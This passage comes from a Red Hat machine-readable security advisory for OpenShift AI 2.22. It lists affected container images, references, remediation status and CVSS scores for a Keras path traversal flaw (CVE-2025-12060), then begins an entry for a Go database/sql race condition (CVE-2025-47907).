"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-12060"
},
{
"category": "external",
"summary": "RHBZ#2407443",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2407443"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-12060",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12060"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-12060",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12060"
},
{
"category": "external",
"summary": "https://github.com/keras-team/keras/pull/21760",
"url": "https://github.com/keras-team/keras/pull/21760"
},
{
"category": "external",
"summary": "https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9",
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9"
}
],
"release_date": "2025-10-30T17:10:43.868000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "keras: Keras Path Traversal Vulnerability"
},
{
"cve": "CVE-2025-47907",
"cwe": {
"id": "CWE-362",
"name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)"
},
"discovery_date": "2025-08-07T16:01:06.247481+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2387083"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in database/sql. Concurrent queries can produce unexpected results when a query is cancelled during a Scan method call on returned Rows, creating a race condition. This vulnerability allows an attacker who can initiate and cancel queries to trigger this condition, possibly leading to inconsistent data being returned to the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "database/sql: Postgres Scan Race Condition",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability marked as Moderate severity issues rather than Important. The os/exec LookPath flaw requires a misconfigured PATH to be exploitable, and the database/sql race condition primarily impacts applications that cancel queries while running multiple queries concurrently. Both can cause unexpected behavior, but the exploitation scope is limited and unlikely to result in direct compromise in most typical deployments.\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027) vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nRed Hat enforces the principle of least functionality, ensuring that only essential features, services, and ports are enabled. The environment leverages malicious code protections such as IPS/IDS and antimalware solutions that detect and respond to indicators in real time, limiting the impact of exploitation attempts. Static code analysis and peer code review techniques are used to execute robust input validation and error-handling mechanisms to ensure all user inputs are 